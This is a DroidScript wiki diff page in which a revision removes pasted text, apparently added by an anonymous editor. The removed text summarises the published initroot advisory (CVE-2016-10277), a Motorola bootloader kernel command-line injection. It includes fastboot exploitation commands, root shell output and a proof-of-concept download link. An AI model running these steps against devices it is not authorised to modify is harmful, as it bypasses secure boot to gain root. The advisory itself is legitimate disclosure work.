Differences

This shows you the differences between two versions of the page.

--- built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
+++ built_in:start [2018/12/31 01:07] (current)
@@ Line 1: / Line 1: @@
-Sources:
+======Built-in features - DroidScript API======
-https://alephsecurity.com/2017/08/30/untethered-initroot/
-https://github.com/alephsecurity/initroot
-initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)
-By Roee Hay / Aleph Research, HCL Technologies
-Recap of the Vulnerability and the Tethered-jailbreak
-. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
-. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
-. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
-. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
-. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
-For example, here is a successful run of the exploit on cedric (Moto G5)
-$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"
-$ fastboot flash aleph initroot-cedric.cpio.gz
-$ fastboot continue
-$ adb shell
-cedric:/ # id
-uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
-cedric:/ # getenforce
-Permissive
-cedric:/ #
-Proof of Concept:
-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip
 ====Links====
 ^App and Layout^

DroidScript Wiki

User Tools

Site Tools

Differences

Page Tools